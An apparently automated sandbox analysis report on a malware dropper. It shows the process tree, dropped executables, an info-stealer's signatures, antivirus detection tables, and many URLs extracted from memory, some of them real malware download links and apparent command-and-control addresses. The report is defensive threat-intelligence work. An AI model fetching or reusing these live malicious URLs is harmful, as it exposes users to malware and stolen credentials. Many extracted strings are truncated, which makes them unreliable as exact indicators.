  Started: JgqIdYSSt70LQLRUqfTzKJw8.exe; 3cs4PKncIzTPVTZHP3GDsO8B.exe; Ca4kQMpVXP8DY5HQ8cbuvFmH.exe; 18 other processes

JgqIdYSSt70LQLRUqfTzKJw8.exe
  Dropped: C:\Users\...\JgqIdYSSt70LQLRUqfTzKJw8.tmp, PE32
  Started: JgqIdYSSt70LQLRUqfTzKJw8.tmp

3cs4PKncIzTPVTZHP3GDsO8B.exe
  Dropped: C:\Users\user\AppData\Local\...\syncUpd.exe, PE32; C:\Users\user\AppData\Local\...\INetC.dll, PE32; C:\Users\user\AppData\...\BroomSetup.exe, PE32
  Started: syncUpd.exe; BroomSetup.exe

Ca4kQMpVXP8DY5HQ8cbuvFmH.exe
  Signatures: Detected unpacking (changes PE section rights); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)); 2 other signatures

18 other processes
  Dropped: C:\Users\...\PvJ9KZy5kaC0ZzTLP46Ng6g6.tmp, PE32; C:\Users\...\jUzz7ezNBFbkGCxJO9DOH9dj.tmp, PE32; C:\Users\...\qvx2vm8LJ8TphvujtDcRyl5q.tmp, PE32; 13 other malicious files
  Signatures: Detected unpacking (overwrites its own PE header); Found Tor onion address; Maps a DLL or memory area into another process; Writes many files with high entropy
  Started: FNi4gQqkHn29EqnTv0rxfxe1.tmp; 7odVnHyI6UBWlRBALo6WuNSW.exe; 7odVnHyI6UBWlRBALo6WuNSW.exe

JgqIdYSSt70LQLRUqfTzKJw8.tmp
  Dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32; C:\Users\user\AppData\...\unins000.exe (copy), PE32; 14 other files (13 malicious)
  Started: simplewebbuilder.exe; simplewebbuilder.exe

syncUpd.exe
  Signatures: Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Tries to harvest and steal browser information (history, passwords, etc)

BroomSetup.exe
  Signatures: Multi AV Scanner detection for dropped file
  Started: cmd.exe

FNi4gQqkHn29EqnTv0rxfxe1.tmp
  Dropped: C:\Users\user\AppData\Local\...\_setup64.tmp, PE32+; C:\Users\user\AppData\Local\...\_iscrypt.dll, PE32; C:\Users\user\AppData\Local\...\_shfoldr.dll, PE32

7odVnHyI6UBWlRBALo6WuNSW.exe (first instance)
  Dropped: Opera_installer_24031207530527645904.dll, PE32

7odVnHyI6UBWlRBALo6WuNSW.exe (second instance)
  Dropped: Opera_installer_24031207531585744560.dll, PE32

simplewebbuilder.exe
  Dropped: C:\...\DirectSoundDriver 2.36.198.67.exe, PE32

Source | Detection | Scanner | Label | Link
file.exe | 34% | Virustotal | - | Browse
file.exe | 100% | Avira | HEUR/AGEN.1313217 | -
file.exe | 100% | Joe Sandbox ML | - | -
Source | Detection | Scanner | Label | Link
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | 100% | Avira | HEUR/AGEN.1315065 | -
C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe | 100% | Avira | HEUR/AGEN.1316657 | -
C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe | 100% | Avira | HEUR/AGEN.1316657 | -
C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe | 100% | Avira | HEUR/AGEN.1316657 | -
C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe | 100% | Avira | HEUR/AGEN.1316657 | -
C:\Users\user\AppData\Local\CZMrbdv3aANr0IrdmBiWfjaH.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\C83U8puVpwkXcWSHiHRNiMd6.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\5TjWUMIFlYsM1w3seMz5vnCW.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\HVNYeIaPfKI1PhwDbNEQTtKf.exe | 100% | Joe Sandbox ML | - | -
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\85Chwg9AW94Pql4pyXLsUn7O.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\86xjLODySsaA2ccNlRbH98y4.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\GGZyi81c9POTwLDASQoRqJGO.exe | 100% | Joe Sandbox ML | - | -
C:\Users\user\AppData\Local\53tlSJicrflVnn9iBsteA9ZP.exe | 100% | Joe Sandbox ML | - | -
C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exe | 37% | ReversingLabs | Win32.Trojan.Generic | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-05C7R.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-177IU.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-4024Q.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-NT0K2.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-R5M1I.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\is-TSKOF.tmp | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\libbz2-1.dll (copy) | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\libgcc_s_dw2-1.dll (copy) | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\libogg-0.dll (copy) | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\libvorbis-0.dll (copy) | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\libwinpthread-1.dll (copy) | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Simple Web Builder Free\simplewebbuilder.exe | 37% | ReversingLabs | Win32.Trojan.Generic | -
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | 75% | ReversingLabs | Win32.Trojan.Znyonm | -
C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530026645880.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530527645904.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Temp\Opera_installer_24031207530974345608.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531585744560.dll | 0% | ReversingLabs | - | -
C:\Users\user\AppData\Local\Temp\Opera_installer_24031207531803244640.dll | 0% | ReversingLabs | - | -
                    No Antivirus matches
                    No Antivirus matches
Source | Detection | Scanner | Label | Link
http://autoupdate-staging.services.ams.osa/v4/v5/netinstaller///windows/x64v2/Fetching | 0% | URL Reputation | safe | -
https://blockchain.infoindex | 0% | URL Reputation | safe | -
http://185.172.128.145/15f649199f40275b/freebl3.dll | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH | 0% | Avira URL Cloud | safe | -
http://trade-inmyus.com/index.php | 0% | Avira URL Cloud | safe | -
https://namecloudvideo.org | 0% | Avira URL Cloud | safe | -
http://galandskiyher5.com/downloads/toolspub1.exe | 100% | Avira URL Cloud | malware | -
http://185.172.128.145/15f649199f40275b/freebl3.dll | 15% | Virustotal | - | Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH | 0% | Virustotal | - | Browse
http://trade-inmyus.com/index.php | 15% | Virustotal | - | Browse
https://namecloudvideo.org | 2% | Virustotal | - | Browse
http://185.172.128.145/6 | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/p | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/3cd2b41cbde8fc9c.phpte3.dllm-data; | 0% | Avira URL Cloud | safe | -
http://localhost:3001api/prefs/?product=$1&version=$2.. | 0% | Avira URL Cloud | safe | -
http://185.172.128.90/q | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/H | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/p | 0% | Virustotal | - | Browse
https://desktop-netinstaller-sub.osp.opera.software/G | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/mozglue.dll | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software | 0% | Virustotal | - | Browse
http://185.172.128.90/cpa/ping.php?substr=seven&s=ab | 100% | Avira URL Cloud | malware | -
https://desktop-netinstaller-sub.osp.opera.software/%4 | 0% | Avira URL Cloud | safe | -
http://www.innosetup.com/ | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/mozglue.dll | 15% | Virustotal | - | Browse
http://galandskiyher5.com/downloads/toolspub1.exe | 19% | Virustotal | - | Browse
http://185.172.128.90/= | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/3cd2b41cbde8fc9c.php | 0% | Avira URL Cloud | safe | -
http://galandskiyher5.com/downloads/toolspub1.exe4kL | 100% | Avira URL Cloud | malware | -
http://185.172.128.126/InstallSetup7.exe4kL | 0% | Avira URL Cloud | safe | -
http://www.innosetup.com/ | 1% | Virustotal | - | Browse
http://185.172.128.145/3cd2b41cbde8fc9c.php | 18% | Virustotal | - | Browse
http://185.172.128.145/15f649199f40275b/vcruntime140.dlltable | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/%4 | 0% | Virustotal | - | Browse
http://crl.ver) | 0% | Avira URL Cloud | safe | -
https://net.geo.oper | 0% | Avira URL Cloud | safe | -
https://gamemaker.io) | 0% | Avira URL Cloud | safe | -
http://185.172.128.90/cpa/ping.php?substr=seven&s=ab | 22% | Virustotal | - | Browse
https://desktop-netinstaller-sub.osp.opera.software/G | 0% | Virustotal | - | Browse
https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe | 0% | Avira URL Cloud | safe | -
http://https://_bad_pdb_file.pdb | 0% | Avira URL Cloud | safe | -
http://185.172.128.187/ | 0% | Avira URL Cloud | safe | -
http://15.204.49.148 | 100% | Avira URL Cloud | malware | -
https://gamemaker.io/en/get. | 0% | Avira URL Cloud | safe | -
https://namecloudvideo.org/3eef203fb515bda85f514e168abb5973.exe | 0% | Virustotal | - | Browse
http://185.172.128.187/ | 15% | Virustotal | - | Browse
http://namecloudvideo.org | 0% | Avira URL Cloud | safe | -
https://gamemaker.io | 0% | Avira URL Cloud | safe | -
http://15.204.49.148 | 18% | Virustotal | - | Browse
https://gamemaker.io/en/get. | 0% | Virustotal | - | Browse
http://185.172.128.187/ping.php?substr=seven | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/v1/binary#= | 100% | Avira URL Cloud | malware | -
http://185.172.128.145/15f649199f40275b/freebl3.dllyq | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/ | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/ry | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/H | 0% | Virustotal | - | Browse
http://185.172.128.187/ping.php?substr=seven | 17% | Virustotal | - | Browse
http://namecloudvideo.org | 2% | Virustotal | - | Browse
https://desktop-netinstaller-sub.osp.opera.software/v1/binary#= | 1% | Virustotal | - | Browse
https://gamemaker.io | 0% | Virustotal | - | Browse
http://185.172.128.145/15f649199f40275b/freebl3.dlliq | 0% | Avira URL Cloud | safe | -
http://185.172.128.187/ping.php?substr=sevenminuser-l1-1-0 | 0% | Avira URL Cloud | safe | -
http://15.204.498: | 0% | Avira URL Cloud | safe | -
https://desktop-netinstaller-sub.osp.opera.software/ry | 0% | Virustotal | - | Browse
http://185.172.128.145/15f649199f40275b/sqlite3.dll | 0% | Avira URL Cloud | safe | -
http://185.172.128 | 0% | Avira URL Cloud | safe | -
ddtwcxy.info | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/ | 2% | Virustotal | - | Browse
https://vovsoft.com/newsletter/ | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/sqlite3.dll | 17% | Virustotal | - | Browse
http://185.172.128.145/15f649199f40275b/sqlite3.dllCR | 0% | Avira URL Cloud | safe | -
http://185.172.128.187/ping.php?substr=seven9 | 0% | Avira URL Cloud | safe | -
https://vovsoft.com/contact/. | 0% | Avira URL Cloud | safe | -
http://195.16.74.230/2 | 0% | Avira URL Cloud | safe | -
http://185.172.128.145/15f649199f40275b/freebl3.dllyq | 4% | Virustotal | - | Browse
                    No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://trade-inmyus.com/index.php | true | 15%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://185.172.128.145/3cd2b41cbde8fc9c.php | true | 18%, Virustotal, Browse; Avira URL Cloud: safe | unknown
ddtwcxy.info | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://galandskiyher5.com/downloads/toolspub1.exe | InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003492000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000346F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037B0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036C2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003494000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032D1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037C0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036B2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003482000.00000004.00000800.00020000.00000000.sdmp | false | 19%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://duckduckgo.com/chrome_newtab | syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://duckduckgo.com/ac/?q= | syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://legal.opera.com/terms | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmp | false | - | high
https://namecloudvideo.org | InstallUtil.exe, 00000004.00000002.3412274842.000000000338C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000037DB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000036F8000.00000004.00000800.00020000.00000000.sdmp | false | 2%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://185.172.128.145/15f649199f40275b/freebl3.dll | syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp, syncUpd.exe, 00000016.00000002.3389892346.00000000009D2000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, syncUpd.exe, 00000016.00000002.3370913149.00000000006C2000.00000004.00000020.00020000.00000000.sdmp | false | 15%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryBH | xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.0000000000879000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://185.172.128.145/6 | syncUpd.exe, 00000016.00000002.3370913149.0000000000668000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://desktop-netinstaller-sub.osp.opera.software/p | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://help.opera.com/latest/ | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp | false | - | high
https://policies.google.com/terms; | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000001.2580815005.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.00000000003EA000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D2A000.00000040.00000001.01000000.00000024.sdmp | false | - | high
https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1 | xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3371271590.0000000000907000.00000004.00000020.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390871165.0000000054B34000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390454774.0000000054AE0000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://download.opera.com/o | xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://185.172.128.145/3cd2b41cbde8fc9c.phpte3.dllm-data; | syncUpd.exe, 00000016.00000002.3346089209.0000000000549000.00000040.00000001.01000000.00000012.sdmp | false | Avira URL Cloud: safe | unknown
https://yip.su/redirect- | InstallUtil.exe, 00000004.00000002.3412274842.00000000034A7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032AD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003402000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003660000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003755000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000377B000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003685000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000038FD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000341C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.00000000032A9000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003299000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.0000000003695000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.3412274842.000000000376B000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://localhost:3001api/prefs/?product=$1&version=$2.. | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp | false | Avira URL Cloud: safe | low
https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp | false | - | high
https://www.opera.com/download/ | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3308381554.0000000000415000.00000040.00000001.01000000.00000014.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3566755586.000000006C077000.00000002.00000001.01000000.00000016.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3408348366.000000006B937000.00000002.00000001.01000000.0000001D.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000018.00000002.3323839664.0000000000415000.00000040.00000001.01000000.00000014.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3391633197.0000000066E37000.00000002.00000001.01000000.00000031.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3379855101.0000000000D55000.00000040.00000001.01000000.00000024.sdmp, XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3292099317.0000000000E95000.00000040.00000001.01000000.00000023.sdmp | false | - | high
http://185.172.128.90/q | 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://download.opera.com/download/get/?id=65171&autoupdate=1&ni=1T | xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390066046.0000000054A8C000.00000004.00001000.00020000.00000000.sdmp, xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3390110534.0000000054A9C000.00000004.00001000.00020000.00000000.sdmp | false | - | high
https://download.opera.com/_ | xzRRQmj1LpBxF1iTy72H1YWe.exe, 0000001F.00000002.3353121599.00000000008AA000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://desktop-netinstaller-sub.osp.opera.software/v1/binaryera.software | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://desktop-netinstaller-sub.osp.opera.software/H | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://desktop-netinstaller-sub.osp.opera.software/G | XgAVLWIvGKK9IeCrDuWuJavo.exe, 00000024.00000002.3291145110.0000000000A78000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://download3.operacdn.com/ | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3239538913.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp, 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E8E000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://185.172.128.145/15f649199f40275b/mozglue.dll | syncUpd.exe, 00000016.00000002.3346089209.0000000000447000.00000040.00000001.01000000.00000012.sdmp | false | 15%, Virustotal, Browse; Avira URL Cloud: safe | unknown
https://turnitin.com/robot/crawlerinfo.html)cannot | N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3376249568.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, N82pZRBoHBOB1dfNMGUFcUyF.exe, 00000023.00000002.3276171407.0000000000400000.00000040.00000001.01000000.00000021.sdmp | false | - | high
https://download3.operacdn.com/u | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000002.3394004764.0000000000E7D000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://185.172.128.90/cpa/ping.php?substr=seven&s=ab | 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.000000000070F000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.0000000000739000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610170276.0000000000733000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614061754.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000002.2614606913.0000000003080000.00000004.00000020.00020000.00000000.sdmp, 3cs4PKncIzTPVTZHP3GDsO8B.exe, 00000015.00000003.2610316156.0000000000738000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3386681499.00000000006AE000.00000004.00000020.00020000.00000000.sdmp, 1V9g5oUcP4AKlGIaRK4CDHUH.exe, 0000001A.00000002.3394349460.0000000002C29000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3395247637.0000000002D66000.00000004.00000020.00020000.00000000.sdmp, HjvCaWONZRgrucQ7NCpBwfHi.exe, 0000001E.00000002.3390868030.000000000098E000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3392643713.0000000002DAA000.00000004.00000020.00020000.00000000.sdmp, NuRMT0uazLQnmOJibnohOTUR.exe, 00000022.00000002.3389719090.000000000081E000.00000004.00000020.00020000.00000000.sdmp | false | 22%, Virustotal, Browse; Avira URL Cloud: malware | unknown
https://desktop-netinstaller-sub.osp.opera.software/%4 | 7odVnHyI6UBWlRBALo6WuNSW.exe, 00000017.00000003.3139369655.0000000000E37000.00000004.00000020.00020000.00000000.sdmp | false | 0%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | InstallUtil.exe, 00000004.00000002.3412274842.0000000003261000.00000004.00000800.00020000.00000000.sdmp | false | - | high
